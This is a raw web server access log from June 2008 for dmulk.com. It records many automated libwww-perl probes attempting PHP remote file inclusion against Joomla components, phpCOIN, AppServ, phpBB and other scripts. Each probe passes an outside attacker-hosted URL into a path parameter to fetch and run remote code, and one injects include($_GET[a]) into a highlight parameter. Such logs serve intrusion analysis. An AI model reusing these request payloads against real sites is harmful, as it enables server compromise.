64.15.147.86 - - [17/Jun/2008:12:44:22 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:44:22 -0700] "GET /logs/access_080313.log//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:44:23 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:44:23 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:44:36 -0700] "GET /logs/access_080313.log//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:44:36 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:44:36 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.246.21.243 - - [17/Jun/2008:12:44:39 -0700] "GET /logs/index.php?open=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.246.21.243 - - [17/Jun/2008:12:44:42 -0700] "GET /index.php?open=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 200 18457 "-" "libwww-perl/5.79" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:44:44 -0700] "GET /logs/access_080308.log//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:44:44 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:44:45 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "dmulk.com"
87.106.101.24 - - [17/Jun/2008:12:45:09 -0700] "GET /logs/db.php?path_local=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:12:45:10 -0700] "GET /db.php?path_local=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.9.184.228 - - [17/Jun/2008:12:45:33 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.9.184.228 - - [17/Jun/2008:12:45:34 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.9.184.228 - - [17/Jun/2008:12:45:36 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.9.184.228 - - [17/Jun/2008:12:45:36 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.9.184.228 - - [17/Jun/2008:12:45:39 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.9.184.228 - - [17/Jun/2008:12:45:39 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.191.61.240 - - [17/Jun/2008:12:45:50 -0700] "GET /test.php?page=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:45:53 -0700] "GET /logs/index.php?ort=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
61.9.184.228 - - [17/Jun/2008:12:45:55 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:45:55 -0700] "GET /index.php?ort=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 200 18427 "-" "libwww-perl/5.812" "www.dmulk.com"
24.75.62.12 - - [17/Jun/2008:12:45:55 -0700] "GET /logs/access_080221.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.75.62.12 - - [17/Jun/2008:12:45:56 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.75.62.12 - - [17/Jun/2008:12:45:56 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.9.184.228 - - [17/Jun/2008:12:45:58 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:12:45:58 -0700] "GET /logs/access_080216.log//index.php/?mosConfig_absolute_path=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:12:46:01 -0700] "GET //index.php/?mosConfig_absolute_path=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 200 18439 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:12:46:02 -0700] "GET /logs//index.php/?mosConfig_absolute_path=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:46:07 -0700] "GET /logs/access_080313.log//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:46:07 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:46:07 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:46:14 -0700] "GET /logs/access_080313.log//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:46:14 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:46:15 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:12:46:18 -0700] "GET /logs/access_080213.log//index.php/?mosConfig_absolute_path=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:12:46:23 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:12:46:23 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:12:46:23 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:12:46:23 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:46:43 -0700] "GET /logs/access_080201.log//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:12:46:49 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:12:46:49 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:12:46:52 -0700] "GET /logs/index.php?pag=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:12:46:52 -0700] "GET /logs/index.php?open=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:12:46:53 -0700] "GET /index.php?pag=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 200 18405 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:12:46:53 -0700] "GET /index.php?open=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 200 18423 "-" "libwww-perl/5.69" "www.dmulk.com"
87.106.98.71 - - [17/Jun/2008:12:47:19 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [17/Jun/2008:12:47:19 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [17/Jun/2008:12:47:56 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [17/Jun/2008:12:47:56 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.147.48 - - [17/Jun/2008:12:48:02 -0700] "GET /logs/index.php?open=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.147.48 - - [17/Jun/2008:12:48:04 -0700] "GET /index.php?open=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 200 18395 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.147.48 - - [17/Jun/2008:12:48:16 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.147.48 - - [17/Jun/2008:12:48:17 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:12:48:25 -0700] "GET /logs/access_080118.log/index.php?pag=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:48:28 -0700] "GET /logs/access_080322.log//include/write.php?dir=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:48:28 -0700] "GET //include/write.php?dir=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:48:28 -0700] "GET /logs//include/write.php?dir=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.29.147.48 - - [17/Jun/2008:12:48:35 -0700] "GET /logs/index.php?pag=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.147.48 - - [17/Jun/2008:12:48:38 -0700] "GET /index.php?pag=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 200 18409 "-" "libwww-perl/5.805" "www.dmulk.com"
124.217.250.190 - - [17/Jun/2008:12:48:53 -0700] "POST /wp-trackback.php HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "www.dmulk.com"
124.217.250.190 - - [17/Jun/2008:12:48:54 -0700] "POST /wp-trackback.php HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "www.dmulk.com"
124.217.250.190 - - [17/Jun/2008:12:48:54 -0700] "POST /wp-trackback.php HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:12:49:04 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:12:49:05 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.246.21.243 - - [17/Jun/2008:12:49:13 -0700] "GET /logs/index.php?include=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.40.147.56 - - [17/Jun/2008:12:49:15 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:12:49:16 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.40.147.56 - - [17/Jun/2008:12:49:18 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.52.115 - - [17/Jun/2008:12:49:30 -0700] "GET /blog/index.php/2008/ HTTP/1.0" 200 17261 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
84.246.21.243 - - [17/Jun/2008:12:49:30 -0700] "GET /index.php?include=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 200 18464 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:49:41 -0700] "GET /logs/access_080322.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:49:41 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:49:41 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
24.75.62.12 - - [17/Jun/2008:12:49:43 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:50:06 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:50:06 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:50:45 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:50:47 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.15.114.74 - - [17/Jun/2008:12:50:51 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://kclarkes.t35.com/cd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.114.74 - - [17/Jun/2008:12:50:52 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://kclarkes.t35.com/cd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:51:09 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:51:09 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
84.246.21.243 - - [17/Jun/2008:12:51:11 -0700] "GET /logs/main.php?pagina=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.246.21.243 - - [17/Jun/2008:12:51:12 -0700] "GET /main.php?pagina=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.139.226 - - [17/Jun/2008:12:51:16 -0700] "GET /logs/main.php?pagina=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [17/Jun/2008:12:51:17 -0700] "GET /main.php?pagina=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:51:21 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:51:21 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:12:51:44 -0700] "GET /logs/index.php?include=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:12:51:46 -0700] "GET /index.php?include=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 200 18413 "-" "libwww-perl/5.69" "www.dmulk.com"
61.155.9.236 - - [17/Jun/2008:12:51:59 -0700] "GET /logs/access_080215.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.informatizados.es/docs/info/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.155.9.236 - - [17/Jun/2008:12:52:00 -0700] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.informatizados.es/docs/info/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.155.9.236 - - [17/Jun/2008:12:52:00 -0700] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.informatizados.es/docs/info/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.74.158.86 - - [17/Jun/2008:12:52:03 -0700] "GET /logs/access_080313.log/components/com_performs/performs.php?mosConfig_absolute_path=http://bucetinha.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.74.158.86 - - [17/Jun/2008:12:52:03 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://bucetinha.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.74.158.86 - - [17/Jun/2008:12:52:05 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://bucetinha.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.98.71 - - [17/Jun/2008:12:52:19 -0700] "GET /logs/index.php?open=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:12:52:20 -0700] "GET /logs/index.php?x=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
87.106.98.71 - - [17/Jun/2008:12:52:22 -0700] "GET /index.php?open=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 18421 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:12:52:22 -0700] "GET /index.php?x=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 200 18385 "-" "libwww-perl/5.69" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:12:53:03 -0700] "GET /logs/main.php?pagina=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:12:53:03 -0700] "GET /main.php?pagina=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.221.143.111 - - [17/Jun/2008:12:53:30 -0700] "GET /logs/db.php?path_local=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [17/Jun/2008:12:53:30 -0700] "GET /db.php?path_local=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
123.214.171.92 - - [17/Jun/2008:12:53:36 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.214.171.92 - - [17/Jun/2008:12:53:36 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:12:53:36 -0700] "GET /logs/index.php?screen=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:12:53:38 -0700] "GET /index.php?screen=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 200 18427 "-" "libwww-perl/5.69" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:12:53:44 -0700] "GET /logs/access_080201.log//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:12:53:48 -0700] "GET /logs/index.php?screen=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:12:53:51 -0700] "GET /index.php?screen=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 200 18411 "-" "libwww-perl/5.805" "www.dmulk.com"
213.254.214.2 - - [17/Jun/2008:12:53:58 -0700] "GET /logs//index.php/?mosConfig_absolute_path=http://queb3.info/cruise/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.254.214.2 - - [17/Jun/2008:12:54:00 -0700] "GET //index.php/?mosConfig_absolute_path=http://queb3.info/cruise/id.txt?? HTTP/1.1" 200 18431 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:54:02 -0700] "GET /logs/access_080126.log//login.php?dir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:54:02 -0700] "GET /logs/access_080126.log//login.php?dir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:54:03 -0700] "GET //login.php?dir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:54:03 -0700] "GET //login.php?dir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:54:04 -0700] "GET /logs//login.php?dir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:54:04 -0700] "GET /logs//login.php?dir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:54:27 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:54:28 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.29.147.48 - - [17/Jun/2008:12:54:29 -0700] "GET /logs/main.php?pagina=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
